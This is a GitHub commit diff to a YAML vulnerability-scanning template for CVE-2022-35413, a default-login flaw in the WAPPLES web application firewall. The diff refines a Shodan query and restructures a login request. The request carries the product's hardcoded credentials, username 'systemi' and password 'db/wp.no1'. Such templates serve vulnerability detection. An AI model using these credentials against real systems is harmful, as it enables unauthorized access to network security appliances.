Update CVE-2022-35413.yaml

patch-1
Ritik Chaddha 2022-09-14 15:58:21 +05:30 committed by GitHub
parent 33c3c92ebe
commit b18d58ba2c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 2 deletions

View File

@ -11,7 +11,7 @@ info:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413
metadata:
verified: true
shodan-query: http.html:"WAPPLES"
shodan-query: http.title:"Intelligent WAPPLES"
tags: cve,cve2022,wapples,firewall,default-login
requests:
@ -21,7 +21,14 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id=systemi&password=db/wp.no1
id={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- systemi
password:
- db/wp.no1
matchers-condition: and
matchers: